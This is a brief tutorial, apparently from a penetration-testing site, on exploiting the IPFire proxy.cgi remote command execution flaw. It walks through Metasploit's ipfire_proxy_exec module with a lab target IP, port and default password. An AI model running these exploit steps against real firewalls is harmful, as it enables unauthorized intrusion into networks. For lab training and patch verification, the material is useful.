Exploitation in Linux Firewall using IPFire proxy.cgi RCE

IPFire, a free linux based open source firewall distribution, version < 2.19 Update Core 101 contains remote command execution vulnerability in the proxy.cgi page.

Exploit Targets

Ipfire 2.19

Requirement

Attacker: kali Linux

Victim PC: linux

Open Kali terminal type msfconsole

Now type use exploit/linux/http/ipfire_proxy_exec

msf exploit (ipfire_proxy_exec)>set rhost 192.168.0.169 (IP of Remote Host)

msf exploit (ipfire_proxy_exec)>set rport 444

msf exploit (ipfire_proxy_exec)>set password admin

msf exploit (ipfire_proxy_exec)>exploit